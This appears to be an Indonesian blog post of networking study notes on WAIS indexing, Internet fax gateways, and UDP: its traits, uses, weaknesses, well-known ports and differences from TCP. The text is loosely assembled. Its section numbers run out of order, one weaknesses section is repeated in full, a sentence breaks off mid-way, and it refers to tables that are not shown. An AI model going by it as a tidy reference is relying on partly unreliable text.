      Aplikasi WAIS biasanya berbasis text. Untuk membuat suatu dokumen dapat dicari melalaui WAIS Server, harus dibuat terlebih dahulu index dari dokumen tersebut. Setiap kata dalam dokumen tersebut diurut dan dihitung jumlahnya. Jika ada query dari client, index akan diperiksa dan hasilnya, yakni dokumen yang memiliki kata-kata tersebut ditampilkan. Karena kemungkinan ada banyak dokumen yang memiliki kata-kata yang kita ajukan, maka beberapa dokumen yang memiliki kata kunci tersebut diberi skor/nilai. Dokumen yang paling banyak mengandung kata-kata kunci akan mendapat skor tertinggi. Dengan demikian, user mendapatkan informasi kemungkinan terbesar dari bebarapa dokumen yang mengandung kumpulan kata yang diajukannya.

      4. FAX di Internet

      Mesin FAX sebagai pengirim dan penerima berita tertulis melalaui telepon saat ini hampir dimiliki oleh semua kantor. Melalaui gateway Internet FAX, pengiriman FAX dapat dilakukan melalaui e-mail. Gateway akan menerjemahkan pesan e-mail tersebut dan menghubungi mesin FAX tujuan melalui jalur telepon secara otomatis. Tentu saja, akses untuk ini terbatas (private).

      2. UDP

      Pengertian UDP

      UDP, singkatan dari User Datagram Protocol, adalah salah satu protokol lapisan transpor TCP/IP yang mendukung komunikasi yang tidak andal (unreliable), tanpa koneksi (connectionless) antara host-host dalam jaringan yang menggunakan TCP/IP.

      Karakteristik UDP

      Karakteristik dari UDP antara lain, yaitu :
      1. Connectionless (tanpa koneksi): Pesan-pesan UDP akan dikirimkan tanpa harus dilakukan proses negosiasi koneksi antara dua host yang hendak berukar informasi.
      2. Unreliable (tidak andal): Pesan-pesan UDP akan dikirimkan sebagai datagram tanpa adanya nomor urut atau pesan acknowledgment. Protokol lapisan aplikasi yang berjalan di atas UDP harus melakukan pemulihan terhadap pesan-pesan yang hilang selama transmisi. Umumnya, protokol lapisan aplikasi yang berjalan di atas UDP mengimplementasikan layanan keandalan mereka masing-masing, atau mengirim pesan secara periodik atau dengan menggunakan waktu yang telah didefinisikan.
      3. UDP menyediakan mekanisme untuk mengirim pesan-pesan ke sebuah protokol lapisan aplikasi atau proses tertentu di dalam sebuah host dalam jaringan yang menggunakan TCP/IP. HeaderUDP berisi field Source Process Identification dan Destination Process Identification.
      4. UDP menyediakan penghitungan checksum berukuran 16-bit terhadap keseluruhan pesan UDP.

      Kegunaan UDP:

      UDP sering digunakan dalam beberapa tugas berikut:
      1. Protokol yang “ringan” (lightweight): Untuk menghemat sumber daya memori dan prosesor, beberapa protokol lapisan aplikasi membutuhkan penggunaan protokol yang ringan yang dapat melakukan fungsi-fungsi spesifik dengan saling bertukar pesan. Contoh dari protokol
      2. Protokol lapisan aplikasi yang mengimplementasikan layanan keandalan: Jika protokol lapisan aplikasi menyediakan layanan transfer data yang andal, maka kebutuhan terhadap keandalan yang ditawarkan oleh TCP pun menjadi tidak ada. Contoh dari protokol seperti ini adalah Trivial File Transfer Protocol (TFTP) dan Network File System (NFS)
      3. Protokol yang tidak membutuhkan keandalan. Contoh protokol ini adalah protokol Routing Information Protocol (RIP).
      4. Transmisi broadcast: Karena UDP merupakan protokol yang tidak perlu membuat koneksi terlebih dahulu dengan sebuah host tertentu, maka transmisi broadcast pun dimungkinkan. Sebuah protokol lapisan aplikasi dapat mengirimkan paket data ke beberapa tujuan dengan menggunakan alamat multicast atau broadcast. Hal ini kontras dengan protokol TCP yang hanya dapat mengirimkan transmisi one-to-one. Contoh: query nama dalam protokol NetBIOS Name Service.

      Kelemahan UDP

      1. UDP tidak menyediakan mekanisme penyanggaan (buffering) dari data yang masuk ataupun data yang keluar. Tugas buffering merupakan tugas yang harus diimplementasikan oleh protokol lapisan aplikasi yang berjalan di atas UDP.
      2. UDP tidak menyediakan mekanisme segmentasi data yang besar ke dalam segmen-segmen data, seperti yang terjadi dalam protokol TCP. Karena itulah, protokol lapisan aplikasi yang berjalan di atas UDP harus mengirimkan data yang berukuran kecil (tidak lebih besar dari nilai Maximum Transfer Unit/MTU) yang dimiliki oleh sebuah antarmuka di mana data tersebut dikirim. Karena, jika ukuran paket data yang dikirim lebih besar dibandingkan nilai MTU, paket data yang dikirimkan bisa saja terpecah menjadi beberapa fragmen yang akhirnya tidak jadi terkirim dengan benar.
      3. UDP tidak menyediakan mekanisme flow-control, seperti yang dimiliki oleh TCP.

      Header UDP

      Header UDP diwujudkan sebagai sebuah header dengan 4 buah field memiliki ukuran yang tetap.

      Port UDP

      Seperti halnya TCP, UDP juga memiliki saluran untuk mengirimkan informasi antar host, yang disebut dengan UDP Port. Untuk menggunakan protokol UDP, sebuah aplikasi harus menyediakan alamat IP dan nomor UDP Port dari host yang dituju. Sebuah UDP port berfungsi sebagai sebuah multiplexed message queue, yang berarti bahwa UDP port tersebut dapat menerima beberapa pesan secara sekaligus. Setiap port diidentifikasi dengan nomor yang unik, seperti halnya TCP, tetapi meskipun begitu, UDP Port berbeda dengan TCP Port meskipun memiliki nomor port yang sama. Tabel di bawah ini mendaftarkan beberapa UDP port yang telah dikenal secara luas.

      Kelemahan UDP

      1. UDP tidak menyediakan mekanisme penyanggaan (buffering) dari data yang masuk ataupun data yang keluar. Tugas buffering merupakan tugas yang harus diimplementasikan oleh protokol lapisan aplikasi yang berjalan di atas UDP.
      2. UDP tidak menyediakan mekanisme segmentasi data yang besar ke dalam segmen-segmen data, seperti yang terjadi dalam protokol TCP. Karena itulah, protokol lapisan aplikasi yang berjalan di atas UDP harus mengirimkan data yang berukuran kecil (tidak lebih besar dari nilai Maximum Transfer Unit/MTU) yang dimiliki oleh sebuah antarmuka di mana data tersebut dikirim. Karena, jika ukuran paket data yang dikirim lebih besar dibandingkan nilai MTU, paket data yang dikirimkan bisa saja terpecah menjadi beberapa fragmen yang akhirnya tidak jadi terkirim dengan benar.
      3. UDP tidak menyediakan mekanisme flow-control, seperti yang dimiliki oleh TCP.

      Aplikasi yang Menggunakan UDP:

      Digunakan untuk multimedia streaming, yang sangat memberikan toleransi kehilangan segment cukup baik dan yang sangat tidak sensitive terhadap kerusakan atau kehilangan segment
      Contoh protokol aplikasi yang menggunakan UDP :
      • DNS (Domain Name System) 53
      • SNMP, (Simple Network Management Protocol) 161, 162
      • TFTP (Trivial File Transfer Protocol) 69
      • SunRPC port 111.

      3. Perbedaan TCP dan UDP

      Berbeda dengan TCP, UDP merupakan connectionless dan tidak ada keandalan, windowing, serta fungsi untuk memastikan data diterima dengan benar. Namun, UDP juga menyediakan fungsi yang sama dengan TCP, seperti transfer data dan multiplexing, tetapi ia melakukannya dengan byte tambahan yang lebih sedikit dalam header UDP.
      UDP melakukan multiplexing UDP menggunakan cara yang sama seperti TCP. Satu-satunya perbedaan adalah transport protocol yang digunakan, yaitu UDP. Suatu aplikasi dapat membuka nomor port yang sama pada satu host, tetapi satu menggunakan TCP dan yang satu lagi menggunakan UDP—hal ini tidak biasa, tetapi diperbolehkan. Jika suatu layanan mendukung TCP dan UDP, ia menggunakan nilai yang sama untuk nomor port TCP dan UDP.
      UDP mempunyai keuntungan dibandingkan TCP dengan tidak menggunakan field sequence dan acknowledgement. Keuntungan UDP yang paling jelas dari TCP adalah byte tambahan yang lebih sedikit. Di samping itu, UDP tidak perlu menunggu penerimaan atau menyimpan data dalam memory sampai data tersebut diterima. Ini berarti, aplikasi UDP tidak diperlambat oleh proses penerimaan dan memory dapat dibebaskan lebih cepat. Pada tabel, Anda dapat melihat fungsi yang dilakukan (atau tidak dilakukan) oleh UDP atau TCP.

      Labels: